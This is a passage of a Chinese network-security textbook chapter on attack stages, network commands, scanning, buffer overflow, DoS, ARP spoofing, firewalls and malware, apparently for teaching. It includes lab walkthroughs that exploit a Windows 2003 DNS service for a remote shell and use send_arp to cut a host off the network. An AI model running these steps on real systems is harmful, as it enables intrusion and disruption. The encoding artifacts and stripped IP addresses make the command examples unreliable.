第5章 網(wǎng)絡(luò)安全技術(shù)

第5章網(wǎng)絡(luò)安全技術(shù)本章學(xué)習(xí)目標(biāo)：了解目前網(wǎng)絡(luò)的安全形式了解黑客攻擊的步驟掌握常用的網(wǎng)絡(luò)命令掌握端口與漏洞掃描工具以及網(wǎng)絡(luò)監(jiān)聽工具的使用理解緩沖區(qū)溢出的攻擊原理理解DoS與DDoS攻擊的原理及其防范理解arp欺騙的原理掌握Windows和Linux中防火墻的配置理解入侵檢測與入侵防御技術(shù)了解計(jì)算機(jī)病毒、蠕蟲和木馬帶來的威脅掌握Windows和Linux中VPN的配置掌握httptunnel技術(shù)的使用了解蜜罐技術(shù)了解無線網(wǎng)絡(luò)安全并且會(huì)配置無線網(wǎng)絡(luò)安全本章學(xué)習(xí)內(nèi)容：5.1網(wǎng)絡(luò)安全形勢5.2黑客攻擊簡介5.3實(shí)例——端口與漏洞掃描及網(wǎng)絡(luò)監(jiān)聽5.4緩沖區(qū)溢出5.5DoS與DDoS攻擊檢測與防御5.6arp欺騙5.7防火墻技術(shù)5.8入侵檢測技術(shù)5.9入侵防御技術(shù)5.10計(jì)算機(jī)傳統(tǒng)病毒5.11蠕蟲病毒5.12特洛伊木馬5.13網(wǎng)頁病毒、網(wǎng)頁掛（木）馬5.14VPN技術(shù)5.15實(shí)例——httptunnel技術(shù)5.16實(shí)例：蜜罐技術(shù)5.17實(shí)例：無線網(wǎng)絡(luò)安全配置5.18本章小結(jié)5.19習(xí)題5.2黑客攻擊簡介

黑客攻擊是當(dāng)今互聯(lián)網(wǎng)安全的主要的威脅。5.2.1黑客攻擊的目的和手段1．黑客攻擊的目的(1)為了竊取、修改或者刪除系統(tǒng)中的相關(guān)信息;(2)為了顯示自己的網(wǎng)絡(luò)技術(shù);(3)為了商業(yè)利益;(4)出于政治目的等。2．黑客攻擊的手段黑客攻擊可分為非破壞性攻擊和破壞性攻擊兩類。非破壞性攻擊：一般是為了擾亂系統(tǒng)的運(yùn)行，并不盜竊系統(tǒng)資料，通常采用拒絕服務(wù)攻擊或信息炸彈的方式。破壞性攻擊：是以侵入他人電腦系統(tǒng)、盜竊系統(tǒng)保密信息、破壞目標(biāo)系統(tǒng)的數(shù)據(jù)為目的。黑客常用的攻擊手段有密碼破解、后門程序、電子郵件攻擊、信息炸彈、拒絕服務(wù)、網(wǎng)絡(luò)監(jiān)聽、利用網(wǎng)絡(luò)系統(tǒng)漏洞進(jìn)行攻擊、暴庫、注入、旁注、Cookie詐騙、WWW的欺騙技術(shù)等。5.2.2黑客攻擊的步驟黑客入侵的步驟一般可以分為3個(gè)階段：確定目標(biāo)與收集相關(guān)信息、獲得對系統(tǒng)的訪問權(quán)力、隱藏蹤跡。黑客入侵的步驟5.2.3黑客入門黑客（Hacker）：是指那些盡力挖掘計(jì)算機(jī)程序功能最大潛力的計(jì)算機(jī)用戶，依靠自己掌握的知識(shí)幫助系統(tǒng)管理員找出系統(tǒng)中的漏洞并加以完善。駭客（Cracker）：是通過各黑客技術(shù)對目標(biāo)系統(tǒng)進(jìn)行攻擊、入侵或者做其他一些有害于目標(biāo)系統(tǒng)或網(wǎng)絡(luò)的事情。一些常用的網(wǎng)絡(luò)命令：ping、ipconfig、arp、nbtstat、netstat、tracert、net、at、route、nslookup、ftp和telnet。1．pingping是一個(gè)用來檢查網(wǎng)絡(luò)是否通暢或者網(wǎng)絡(luò)連接速度快慢的網(wǎng)絡(luò)命令。其目的就是通過發(fā)送特定形式的ICMP包來請求主機(jī)的回應(yīng)，進(jìn)而獲得主機(jī)的一些屬性，用于確定本地主機(jī)是否能與另一臺(tái)主機(jī)交換（發(fā)送與接收）數(shù)據(jù)包。

例如:ping20通過ping命令檢測網(wǎng)絡(luò)故障的一個(gè)典型步驟如下：第1步：ping。如果不能ping通，就表示TCP/IP協(xié)議的安裝或運(yùn)行存在問題。第2步：ping本機(jī)IP。如果不能ping通，就表示本機(jī)網(wǎng)絡(luò)配置或安裝存在問題。此時(shí)，局域網(wǎng)用戶要斷開網(wǎng)絡(luò)連接，然后重新ping本機(jī)IP。如果網(wǎng)線斷開后能ping通，就表示局域網(wǎng)中的另一臺(tái)計(jì)算機(jī)可能配置了與本機(jī)相同的IP地址，造成IP地址沖突。第3步：ping局域網(wǎng)內(nèi)其他IP。如果不能ping通，表示子網(wǎng)掩碼的設(shè)置不正確，或者網(wǎng)卡的配置有問題，或者網(wǎng)絡(luò)連線有問題。第4步：ping網(wǎng)關(guān)IP。如果能ping通，表示局域網(wǎng)的網(wǎng)關(guān)路由器運(yùn)行正常。第5步：ping遠(yuǎn)程IP。如果能ping通，表示默認(rèn)網(wǎng)關(guān)設(shè)置正確。第6步：pinglocalhost。localhost是的別名，每臺(tái)計(jì)算機(jī)都應(yīng)該能夠?qū)ocalhost解析成。如果不能ping通，說明在主機(jī)文件（C:\WINDOWS\system32\drivers\etc\hosts）中存在問題。第7步：ping。如果不能ping通，表示DNS服務(wù)器的IP地址配置錯(cuò)誤，或者DNS服務(wù)器發(fā)生了故障。2．ipconfigIpconfig命令用于顯示所有當(dāng)前的TCP/IP網(wǎng)絡(luò)配置值、刷新動(dòng)態(tài)主機(jī)配置協(xié)議(DHCP)和域名系統(tǒng)(DNS)設(shè)置。例如：ipconfig用于顯示已經(jīng)配置的網(wǎng)絡(luò)接口的IP地址、子網(wǎng)掩碼、默認(rèn)網(wǎng)關(guān)。例如：Ipconfig/all用于顯示所有網(wǎng)絡(luò)接口的詳細(xì)網(wǎng)絡(luò)參數(shù)設(shè)置。例如：ipconfig/release用于將所有網(wǎng)絡(luò)接口租用的ip地址歸還給DHCP服務(wù)器。例如：ipconfig/renew用于和DHCP服務(wù)器取得聯(lián)系，并重新租用一個(gè)ip地址。3．a(chǎn)rp該命令用于顯示和修改“地址解析協(xié)議(ARP)”緩存中的項(xiàng)目。ARP緩存中包含一個(gè)或多個(gè)表，它們用于存儲(chǔ)IP地址及其經(jīng)過解析的以太網(wǎng)或令牌環(huán)物理地址。例如：arp–a用于顯示所有接口的當(dāng)前ARP緩存表。4．nbtstat該命令用于顯示本地計(jì)算機(jī)和遠(yuǎn)程計(jì)算機(jī)的基于TCP/IP(NetBT)協(xié)議的NetBIOS統(tǒng)計(jì)資料、NetBIOS名稱表和NetBIOS名稱緩存。

例如：nbtstat-a20顯示遠(yuǎn)程計(jì)算機(jī)20的NetBIOS信息。例如：nbtstat-n顯示本地計(jì)算機(jī)的NetBIOS信息。5．netstat用來顯示計(jì)算機(jī)上網(wǎng)時(shí)與其他計(jì)算機(jī)之間詳細(xì)的連接情況和統(tǒng)計(jì)信息（與IP、TCP、UDP和ICMP協(xié)議相關(guān)的統(tǒng)計(jì)數(shù)據(jù)）。netstat命令一般用來檢測本機(jī)各端口的網(wǎng)絡(luò)連接情況。例如：netstat-a顯示所有連接和監(jiān)聽端口。例如：netstat-e顯示以太網(wǎng)統(tǒng)計(jì)信息。例如：netstat-r顯示路由表。6．tracert用來顯示數(shù)據(jù)包到達(dá)目的主機(jī)所經(jīng)過的每一個(gè)路由或網(wǎng)關(guān)的IP地址，并顯示到達(dá)每個(gè)路由或網(wǎng)關(guān)所用的時(shí)間。例如：tracert20顯示數(shù)據(jù)包到達(dá)20所經(jīng)過的每一個(gè)路由或網(wǎng)關(guān)的IP地址，并顯示到達(dá)每個(gè)路由或網(wǎng)關(guān)所用的時(shí)間。tracert7．netnet是一個(gè)功能強(qiáng)大的網(wǎng)絡(luò)命令（只能在Windows中使用）例如：netview\\53查看遠(yuǎn)程主機(jī)的所有共享資源。例如：netusex:\\53\lxh把遠(yuǎn)程主機(jī)53的共享資源lxh映射為本地磁盤X。例如：netshare用來顯示共享資源。例如：netstarttelnet當(dāng)和遠(yuǎn)程主機(jī)建立連接后，用來啟動(dòng)遠(yuǎn)程主機(jī)上的telnet服務(wù)。例如：netstoptelnet當(dāng)和遠(yuǎn)程主機(jī)建立連接后，用來關(guān)閉遠(yuǎn)程主機(jī)上的telnet服務(wù)。例如：netuser用于查看和帳戶有關(guān)的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。netuserabcd1234/add新建一個(gè)用戶名為abcd，密碼為1234的帳戶，默認(rèn)為user組成員。netuserabcd/active:no將用戶名為abcd的用戶禁用。netuserabcd查看用戶名為abcd的用戶的情況。netuserabcd/active:yes激活用戶名為abcd的用戶。netuserabcd/del將用戶名為abcd的用戶刪除。8．a(chǎn)t用于在特定日期或時(shí)間執(zhí)行某個(gè)命令或程序。nettime\\20可以查看遠(yuǎn)程主機(jī)當(dāng)前的時(shí)間。at6:55netstarttelnet\\20。在6點(diǎn)55分時(shí)，讓ip為20的計(jì)算機(jī)開啟telnet服務(wù)。9．route用于在本地IP路由表中顯示和修改條目。例子1：要顯示IP路由表的完整內(nèi)容

route

print

例子2：要顯示IP路由表中以10.開始的路由

route

print

10.*

例子3：要添加默認(rèn)網(wǎng)關(guān)地址為的默認(rèn)路由

route

add

mask

例子4：要添加目標(biāo)為，子網(wǎng)掩碼為，下一個(gè)躍點(diǎn)地址為的路由route

add

mask

例子5：要添加目標(biāo)為，子網(wǎng)掩碼為，下一個(gè)躍點(diǎn)地址為的永久路由route-paddmask例子6：要添加目標(biāo)為，子網(wǎng)掩碼為，下一個(gè)躍點(diǎn)地址為，躍點(diǎn)數(shù)為7的路由routeaddmaskmetric7例子7：要添加目標(biāo)為，子網(wǎng)掩碼為，下一個(gè)躍點(diǎn)地址為，接口索引為0x3的路由routeaddmaskif0x3

例子8：要?jiǎng)h除目標(biāo)為，子網(wǎng)掩碼為的路由routedeletemask例子9：要?jiǎng)h除IP路由表中以10.開始的所有路由routedelete10.*例子10：要將目標(biāo)為，子網(wǎng)掩碼為的路由的下一個(gè)躍點(diǎn)地址由更改為5routechangemask510．nslookup可以查看遠(yuǎn)程主機(jī)的IP地址、主機(jī)名稱、DNS的IP地址。例如：nslookup用于顯示所使用的Web服務(wù)器群的IP地址。11．ftp通過ftp服務(wù)登錄到ftp服務(wù)器，實(shí)現(xiàn)文件上傳、下載、刪除等?！伴_始”-“運(yùn)行”-輸入ftp2021UsernamePasswordDirPutc:\a.txtGeta.txtDeleltea.txtquit12．telnet如果遠(yuǎn)程主機(jī)啟動(dòng)了telnet服務(wù)，那么可以使用telnet命令登錄遠(yuǎn)程主機(jī)（需要用戶名和密碼）。啟動(dòng)telnet服務(wù)：1.計(jì)算機(jī)名<15個(gè)字符；2.執(zhí)行命令：tlntsvr/service例如：telnet20usernamepassword5.2.4黑客工具黑客工具可以分為7大類：信息搜集類、漏洞掃描類、遠(yuǎn)程控制類、信息炸彈類、密碼破解類、偽裝類及NetCat。1．信息搜集類監(jiān)聽軟件Analyzer3.0a12，其下載地址為：http://netgroup.polito.it/tools；監(jiān)聽軟件Wireshark，其下載地址為：。監(jiān)聽軟件Analyzer監(jiān)聽軟件Wireshark2．漏洞掃描類（1）掃描器X-Scanner，其下載地址為：/。（2）掃描器Superscan。Superscan是一個(gè)功能強(qiáng)大的掃描器，掃描速度非常快。（3）掃描器流光。是一款國產(chǎn)軟件時(shí)，是許多黑客手中必備工具之一。4．信息炸彈類比如郵件炸彈、DoS或DDoS攻擊。5．密碼破解類密碼破解類軟件就是用密碼字典或者窮舉法（暴力破解）來解密文件。6．偽裝類網(wǎng)絡(luò)上進(jìn)行的各種操作如果沒有經(jīng)過很好的偽裝都會(huì)被ISP、服務(wù)器記錄下來，然后被反跟蹤技術(shù)追查到自己的大概物理位置，為了不被發(fā)現(xiàn)，可以使用這類軟件。7．NetCatNetCat是一個(gè)用途廣泛的TCP和UDP連接工具，對系統(tǒng)管理員以及網(wǎng)絡(luò)調(diào)試人員來說非常有用。不過，NetCat也是一個(gè)攻擊網(wǎng)絡(luò)的強(qiáng)大工具。5.3實(shí)例—端口與漏洞掃描及網(wǎng)絡(luò)監(jiān)聽漏洞掃描是對計(jì)算機(jī)系統(tǒng)或其他網(wǎng)絡(luò)設(shè)備進(jìn)行與安全相關(guān)的檢測，找出安全隱患和可被黑客利用的漏洞。系統(tǒng)管理員利用漏洞掃描軟件檢測出系統(tǒng)漏洞以便有效地防范黑客入侵，然而黑客可以利用漏洞掃描軟件檢測系統(tǒng)漏洞以利于入侵系統(tǒng)。注意：一個(gè)端口就是一扇進(jìn)入計(jì)算機(jī)系統(tǒng)的門。1．漏洞掃描與網(wǎng)絡(luò)監(jiān)聽掃描與監(jiān)聽的實(shí)驗(yàn)環(huán)境入侵者（85）：運(yùn)行X-Scan對95進(jìn)行漏洞掃描。被入侵者（95）：用Analyzer分析進(jìn)來的數(shù)據(jù)包，判斷是否遭到掃描攻擊。第1步：被入侵者(95),開始網(wǎng)絡(luò)監(jiān)聽。第2步：入侵者(85)，啟動(dòng)X-Scan，設(shè)置參數(shù)。設(shè)置|打描參數(shù)，在指定范圍中輸入95第3步：入侵者(85),進(jìn)行漏洞掃描。文件|開始掃描第4步：入侵者(85),掃描完成。第5步：被入侵者(95),停止網(wǎng)絡(luò)監(jiān)聽。2．漏洞漏洞是指系統(tǒng)硬件或者軟件存在某種形式的安全方面的脆弱性，從而使得攻擊者能夠在未授權(quán)的情況下訪問、控制系統(tǒng)。3．端口掃描端口掃描是通過TCP或UDP的連接來判斷目標(biāo)主機(jī)上是否有相關(guān)的服務(wù)正在運(yùn)行并且進(jìn)行監(jiān)聽。比如使用端口掃描器AdvancedPortScanner對某網(wǎng)段進(jìn)行掃描。5.4.2實(shí)例—緩沖區(qū)溢出攻擊及其防范1．實(shí)驗(yàn)環(huán)境入侵者（）：對28進(jìn)行緩沖區(qū)溢出攻擊。被入侵者（28）：是開啟DNS服務(wù)的所有版本的Windows2000Server或Windows2003ServerSP1，在本次測試中使用Windows2003ServerSP1。準(zhǔn)備工作:在被入侵者windows2003(28)sp1中安裝DNS、安裝telnet、開啟DNS服務(wù)和telnet服務(wù)。(1)安裝DNS。開始|設(shè)置|控制面板|添加刪除程序|添加刪除windows組件|網(wǎng)絡(luò)服務(wù)|域名系統(tǒng)(DNS)(2)安裝telnet。先將計(jì)算機(jī)名稱改為<15個(gè)字符；再選開始|運(yùn)行,輸入cmd,再輸入tlntsvr/service。(3)開啟DNS服務(wù)和telnet服務(wù)。開始|程序|管理工具|服務(wù)|DNSserver和telnet。2．緩沖區(qū)溢出攻擊過程第1步：入侵者下載并且執(zhí)行dns.exe命令。將下載的dns.exe復(fù)制到C:\DocumentsandSettings\Administrator，在命令提示符窗口執(zhí)行dns.exe命令。第2步：入侵者尋找漏洞。在命令提示符窗口執(zhí)行dns.exe

-s28命令，對主機(jī)進(jìn)行掃描，顯示出被入侵主機(jī)（28）開放的端口以及操作系統(tǒng)，最主要的是顯示“1047:Vulnerability”，意思就是1047端口存在漏洞。第3步：入侵者實(shí)施溢出。在命令提示符窗口執(zhí)行dns.exe

-t2003chs281047命令，其中-t2003chs即簡體中文版的2003系統(tǒng)，如果是2000的系統(tǒng)就使用“-2000all”參數(shù)，28就是我們的目標(biāo)IP地址，1047就是剛才掃描出存在漏洞的端口。出現(xiàn)“Attacksent,checkport1100”字樣，說明已經(jīng)打開了目標(biāo)地址的1100端口。第4步：成功入侵。執(zhí)行telnet281100命令，我們現(xiàn)在已經(jīng)成功地入侵了對方的電腦，并且得到了管理員的權(quán)限。第5步：在已經(jīng)成功入侵的電腦上執(zhí)行簡單的操作。3．緩沖區(qū)溢出攻擊的防范措施（1）關(guān)閉不需要的特權(quán)程序。（2）及時(shí)給系統(tǒng)和服務(wù)程序漏洞打補(bǔ)丁。（3）強(qiáng)制寫正確的代碼。（4）通過操作系統(tǒng)使得緩沖區(qū)不可執(zhí)行，從而阻止攻擊者植入攻擊代碼。（5）利用編譯器的邊界檢查來實(shí)現(xiàn)緩沖區(qū)的保護(hù)，這個(gè)方法使得緩沖區(qū)溢出不可能出現(xiàn)，從而完全消除了緩沖區(qū)溢出的威脅，但是代價(jià)比較大。（6）在程序指針失效前進(jìn)行完整性檢查。（7）改進(jìn)系統(tǒng)內(nèi)部安全機(jī)制。5.5.2DoS與DDoS攻擊什么是DoS與DDoS攻擊？（1）DoS。DoS（DenialofService，拒絕服務(wù)）攻擊是通過對主機(jī)特定漏洞的利用進(jìn)行攻擊導(dǎo)致網(wǎng)絡(luò)棧失效、系統(tǒng)崩潰、主機(jī)死機(jī)而無法提供正常的網(wǎng)絡(luò)服務(wù)功能，從而造成拒絕服務(wù)，或者利用合理的服務(wù)請求來占用過多的服務(wù)器資源（包括網(wǎng)絡(luò)帶寬、文件系統(tǒng)空間容量或者網(wǎng)絡(luò)連接等），致使服務(wù)器超載，最終無法響應(yīng)其他用戶正常的服務(wù)請求。DoS攻擊一般采用一對一的方式。常見的DoS攻擊方式有：死亡之ping（pingofdeath）、TCP全連接攻擊、SYNFlood、SYN/ACKFlood、TearDrop、Land、Smurf、刷Script腳本攻擊、UDP攻擊等。（2）DDoS。DDoS（DistributedDenialofService，分布式拒絕服務(wù)）攻擊，又被稱為“洪水式攻擊”，是在DoS攻擊的基礎(chǔ)上產(chǎn)生的一種分布式、協(xié)作式的大規(guī)模拒絕服務(wù)攻擊方式。DDoS攻擊策略側(cè)重于通過很多“僵尸主機(jī)”（被攻擊者入侵過或可間接利用的主機(jī)）向受害主機(jī)發(fā)送大量看似合法的網(wǎng)絡(luò)數(shù)據(jù)包，從而造成網(wǎng)絡(luò)阻塞或服務(wù)器資源耗盡而導(dǎo)致拒絕服務(wù)。DDoS的攻擊形式主要有：流量攻擊和資源耗盡攻擊。①流量攻擊：主要是針對網(wǎng)絡(luò)帶寬的攻擊，即大量攻擊包導(dǎo)致網(wǎng)絡(luò)帶寬被阻塞，合法網(wǎng)絡(luò)包被虛假的攻擊包淹沒而無法到達(dá)主機(jī)。②資源耗盡攻擊：主要是針對服務(wù)器主機(jī)的攻擊，即通過大量攻擊包導(dǎo)致主機(jī)的內(nèi)存被耗盡或CPU被占完而導(dǎo)致無法提供正常網(wǎng)絡(luò)服務(wù)。DDoS攻擊采用多對一的方式。常見的DDoS攻擊方式有SYNFlood、ACKFlood、UDPFlood、ICMPFlood、TCPFlood、ConnectionsFlood、ScriptFlood、ProxyFlood等。5.5.3DoS與DDoS攻擊檢測與防范1．拒絕服務(wù)攻擊的檢測常用的檢測方法有：使用ping命令檢測，使用netstat命令檢測。（1）使用ping命令檢測。使用ping命令檢測時(shí)如果出現(xiàn)超時(shí)或者嚴(yán)重丟包的現(xiàn)象，則有可能是受到了流量攻擊。如果使用ping命令測試某服務(wù)器時(shí)基本正常，但無法訪問服務(wù)（比如無法打開網(wǎng)頁等），而ping同一交換機(jī)上的其他主機(jī)正常，則有可能是受到了資源耗盡攻擊。（2）使用netstat命令檢測。在服務(wù)器上執(zhí)行netstat-an命令，如果顯示大量的SYN_RECEIVED、TIME_WAIT、FIN_WAIT_1等狀態(tài)，而ESTABLISHED狀態(tài)很少，則可以判定是受到了資源耗盡攻擊。2．拒絕服務(wù)攻擊的防范（1）采用高性能的網(wǎng)絡(luò)設(shè)備。最好采用高性能的網(wǎng)絡(luò)設(shè)備，并且及時(shí)升級(jí)主機(jī)服務(wù)器的硬件配置，尤其是主機(jī)和內(nèi)存，以提高抗拒絕服務(wù)攻擊的能力。（2）避免NAT的使用。無論是路由器還是防火墻都要避免使用NAT（網(wǎng)絡(luò)地址轉(zhuǎn)換）。（3）充足的網(wǎng)絡(luò)帶寬。網(wǎng)絡(luò)帶寬直接決定了網(wǎng)絡(luò)能夠承受拒絕服務(wù)攻擊的能力。（4）把網(wǎng)站做成靜態(tài)頁面。把網(wǎng)站盡可能做成靜態(tài)頁面，不僅可以提高抗攻擊能力，還能夠增加黑客入侵的難度，比如搜狐、新浪等大型門戶網(wǎng)站主要采用靜態(tài)頁面。（5）增強(qiáng)操作系統(tǒng)的TCP/IP棧。（6）安裝專業(yè)抗DDoS防火墻。（7）采用負(fù)載均衡技術(shù)。將網(wǎng)站分布在多個(gè)主機(jī)上，每個(gè)主機(jī)只提供網(wǎng)站的一部分服務(wù)，以避免受攻擊時(shí)全部癱瘓。5.6arp欺騙arp欺騙攻擊是通過偽造IP地址和MAC地址實(shí)現(xiàn)arp欺騙的攻擊技術(shù)。5.6.1實(shí)例——arp欺騙1．實(shí)驗(yàn)環(huán)境欺騙者linux（29）。被欺騙者xp（）。2．a(chǎn)rp欺騙過程第1步：被欺騙者(xp)可以ping通欺騙者(linux)。被欺騙者xp（）執(zhí)行ping29-n1命令，可以ping通。然后執(zhí)行arp-a命令查看arp緩存，得知欺騙者linux（29）MAC地址為00-0c-29-d5-91-01。欺騙者(linux)可以ping通欺騙者(xp)。欺騙者linux（29）執(zhí)行ping-n1命令，可以ping通。然后執(zhí)行arp-a命令查看arp緩存，得知欺騙者xp（）MAC地址為00:50:56:c0:00:08。第2步：linux對xp進(jìn)行arp欺騙。欺騙者linux（29）先執(zhí)行ifconfigeth0命令，查看本網(wǎng)卡的MAC地址，然后執(zhí)行./send_arp.o2900:0c:29:d5:91:11

00:50:56:c0:00:081命令，對被欺騙者xp()進(jìn)行arp欺騙。其中，send_arp.o語法為：send_arp.o源ip地址假mac地址目標(biāo)ip地址目標(biāo)mac地址number提示：被欺騙者xp（）MAC地址的獲得可以在欺騙者linux中先執(zhí)行ping命令，然后執(zhí)行arp-a命令查看arp緩存。第3步：被欺騙者(xp)不可以ping通欺騙者(linux)。被欺騙者(xp)先執(zhí)行ping29-n1命令，不可以ping通，再執(zhí)行arp-a命令查看arp緩存，可知29的MAC地址已變。如果本網(wǎng)絡(luò)的網(wǎng)關(guān)是54，那么想讓00不能訪問互聯(lián)網(wǎng)，就可以執(zhí)行命令./send_arp.o54“假M(fèi)AC”00“100的MAC”1命令，對00進(jìn)行arp欺騙?？梢悦糠昼妶?zhí)行一次該命令，00得不到正確的到網(wǎng)關(guān)的arp映射表項(xiàng)，就訪問不了互聯(lián)網(wǎng)了。5.6.2arp欺騙的原理與防范1．a(chǎn)rp欺騙的原理arp（AddressResolutionProtocol）用來建立IP地址與MAC地址的對應(yīng)關(guān)系?？梢酝ㄟ^編程的方式構(gòu)建arp應(yīng)答數(shù)據(jù)包，然后發(fā)送給被欺騙者，用假的IP地址與MAC地址的映射來更新被欺騙者的arp高速緩存，實(shí)現(xiàn)對被欺騙者的arp欺騙。有兩種arp欺騙：一種是對路由器arp高速緩存的欺騙；另一種是對內(nèi)網(wǎng)電腦arp高速緩存的欺騙。2．a(chǎn)rp欺騙攻擊的防范（1）在客戶端使用arp命令綁定網(wǎng)關(guān)的IP/MAC（例如arp-s00-e0-eb-81-81-85）。（2）在交換機(jī)上做端口與MAC地址的靜態(tài)綁定。（3）在路由器上做IP/MAC地址的靜態(tài)綁定。（4）使用arp服務(wù)器定時(shí)廣播網(wǎng)段內(nèi)所有主機(jī)的正確IP/MAC映射表。（5）及時(shí)升級(jí)客戶端的操作系統(tǒng)和應(yīng)用程序補(bǔ)丁。（6）升級(jí)殺毒軟件及其病毒庫。5.7防火墻技術(shù)防火墻（FireWall）是一種重要的網(wǎng)絡(luò)防護(hù)設(shè)備，是一種保護(hù)計(jì)算機(jī)網(wǎng)絡(luò)、防御網(wǎng)絡(luò)入侵的有效機(jī)制。1．防火墻的基本原理防火墻是控制從網(wǎng)絡(luò)外部訪問本網(wǎng)絡(luò)的設(shè)備，通常位于內(nèi)網(wǎng)與Internet的連接處（網(wǎng)絡(luò)邊界），充當(dāng)訪問網(wǎng)絡(luò)的唯一入口（出口），用來加強(qiáng)網(wǎng)絡(luò)之間訪問控制，防止外部網(wǎng)絡(luò)用戶以非法手段通過外部網(wǎng)絡(luò)進(jìn)入內(nèi)部網(wǎng)絡(luò)，訪問內(nèi)部網(wǎng)絡(luò)資源，從而保護(hù)內(nèi)部網(wǎng)絡(luò)設(shè)備。防火墻根據(jù)過濾規(guī)則來判斷是否允許某個(gè)訪問請求。2．防火墻的作用防火墻能夠提高網(wǎng)絡(luò)整體的安全性，因而給網(wǎng)絡(luò)安全帶來了眾多的好處，防火墻的主要作用有：（1）保護(hù)易受攻擊的服務(wù)。（2）控制對特殊站點(diǎn)的訪問。（3）集中的安全管理。（4）過濾非法用戶，對網(wǎng)絡(luò)訪問進(jìn)行記錄和統(tǒng)計(jì)。3．防火墻的基本類型根據(jù)防火墻的外在形式可以分為：軟件防火墻、硬件防火墻、主機(jī)防火墻、網(wǎng)絡(luò)防火墻、Windows防火墻、Linux防火墻等。根據(jù)防火墻所采用的技術(shù)可以分為：包過濾型、NAT、代理型和監(jiān)測型防火墻等。5.7.2實(shí)例—Windows中防火墻配置Windows

XP

SP2中防火墻的設(shè)置依次單擊“開始”→“設(shè)置”→“控制面板”菜單命令，然后單擊控制面板中的“安全中心”一項(xiàng)，再單擊“Windows防火墻”一項(xiàng)，即可打開Windows防火墻控制臺(tái)。（1）“常規(guī)”選項(xiàng)卡設(shè)置?！俺Ｒ?guī)”選項(xiàng)卡中有：兩個(gè)主選項(xiàng)和一個(gè)子選項(xiàng)。①兩個(gè)主選項(xiàng)：啟用（推薦）和關(guān)閉（不推薦）。②一個(gè)子選項(xiàng)：“不允許例外”。如果選擇了“不允許例外”，Windows防火墻將攔截所有的連接用戶計(jì)算機(jī)的網(wǎng)絡(luò)請求，包括在例外選項(xiàng)卡列表中的應(yīng)用程序和系統(tǒng)服務(wù)。另外，防火墻也將攔截文件和打印機(jī)共享。默認(rèn)情況下已選中“啟用（推）”。當(dāng)Windows防火墻處于打開狀態(tài)時(shí)，大部分程序都被阻止通過防火墻。如果想要解除對某一程序的阻止，可以將其添加到“例外”列表（“例外”選項(xiàng)卡）。5.10計(jì)算機(jī)傳統(tǒng)病毒

1．傳統(tǒng)計(jì)算機(jī)病毒的定義計(jì)算機(jī)病毒是一組計(jì)算機(jī)指令或者程序代碼，能自我復(fù)制，通常嵌入在計(jì)算機(jī)程序中，能夠破壞計(jì)算機(jī)功能或者毀壞數(shù)據(jù)，影響計(jì)算機(jī)的使用。2．傳統(tǒng)計(jì)算機(jī)病毒的特性傳統(tǒng)計(jì)算機(jī)病毒的特性有：可執(zhí)行性、傳染性、潛伏性、可觸發(fā)性和針對性。

3．傳統(tǒng)計(jì)算機(jī)病毒的分類（1）按計(jì)算機(jī)病毒攻擊的系統(tǒng)分類，分為：DOS病毒、Windows病毒、UNIX/Linux病毒。具體如表5.20/200所示。（2）按計(jì)算機(jī)病毒的寄生方式分類，分為：文件型病毒、源碼型病毒、嵌入型病毒、外殼型病毒、操作系統(tǒng)型病毒、引導(dǎo)型病毒、混合型病毒和宏病毒。具體如表5.21/201所示。（3）按計(jì)算機(jī)病毒的破壞情況分類，分為：良性計(jì)算機(jī)病毒和惡性計(jì)算機(jī)病毒。具體如表5.22/201所示。（4）按計(jì)算機(jī)病毒激活的時(shí)間分類，分為：定時(shí)和隨機(jī)。具體如表5.23/201所示。（5）按計(jì)算機(jī)病毒傳播媒介分類，分為：單機(jī)病毒和網(wǎng)絡(luò)病毒。具體如表5.24/202所示。4．傳統(tǒng)計(jì)算機(jī)病毒傳染的前提條件計(jì)算機(jī)病毒傳染的前提條件是：計(jì)算機(jī)系統(tǒng)的運(yùn)行、磁盤的讀寫。5．目前反病毒的成熟技術(shù)目前反病毒的成熟技術(shù)是“特征碼查殺”，工作流程是：截獲病毒、分析病毒并且提取特征碼、升級(jí)病毒庫。5.11蠕蟲病毒1．蠕蟲病毒的基本概念蠕蟲是計(jì)算機(jī)病毒的一種，是利用計(jì)算機(jī)網(wǎng)絡(luò)和安全漏洞來復(fù)制自身的一小段代碼。蠕蟲代碼可以掃描網(wǎng)絡(luò)來查找具有特定安全漏洞的其他計(jì)算機(jī)，然后利用該安全漏洞獲得計(jì)算機(jī)的部分或全部控制權(quán)并且將自身復(fù)制到計(jì)算機(jī)中，然后又從新的位置開始進(jìn)行復(fù)制。2．網(wǎng)絡(luò)蠕蟲和病毒的區(qū)別蠕蟲與病毒的最大不同在于它在沒有人為干預(yù)的情況下不斷地進(jìn)行自我復(fù)制和傳播。表5.25/203列出了病毒和蠕蟲的主要區(qū)別。3．蠕蟲的工作流程蠕蟲程序的工作流程可以分為漏洞掃描、攻擊、傳染、現(xiàn)場處理4個(gè)階段。4．蠕蟲的行為特征通過對蠕蟲工作流程的分析，歸納出了它的行為特征，分別為:自我繁殖、利用軟件漏洞、造成網(wǎng)絡(luò)擁塞、消耗系統(tǒng)資源和留下安全隱患，如表5.26/203所示。5．蠕蟲的危害蠕蟲的危害有兩個(gè)方面。（1）蠕蟲大量而快速的復(fù)制使得網(wǎng)絡(luò)上的掃描數(shù)據(jù)包迅速增多，占用大量帶寬，造成網(wǎng)絡(luò)擁塞，進(jìn)而使網(wǎng)絡(luò)癱瘓。（2）網(wǎng)絡(luò)上存在漏洞的主機(jī)被掃描到以后，會(huì)被迅速感染，可能造成管理員權(quán)限被竊取。6．蠕蟲病毒的一般防治方法使用具有實(shí)時(shí)監(jiān)控功能的殺毒軟件，不要輕易打開不熟悉電子郵件的附件等。7．“沖擊波”蠕蟲病毒的清除“沖擊波”是一種利用Windows系統(tǒng)的RPC（遠(yuǎn)程過程調(diào)用）漏洞進(jìn)行傳播、隨機(jī)發(fā)作、破壞力強(qiáng)的蠕蟲病毒?！皼_擊波”中毒癥狀：系統(tǒng)資源緊張，應(yīng)用程序運(yùn)行速度異常；網(wǎng)絡(luò)速度減慢，用戶不能正常瀏覽網(wǎng)頁或收發(fā)電子郵件；不能進(jìn)行復(fù)制、粘貼操作；Word、Excel、PowerPoint等軟件無法正常運(yùn)行；系統(tǒng)無故重啟，或在彈出“系統(tǒng)關(guān)機(jī)”警告提示后自動(dòng)重啟等（注意：關(guān)閉“系統(tǒng)關(guān)機(jī)”提示框的方法是在出現(xiàn)關(guān)機(jī)提示時(sh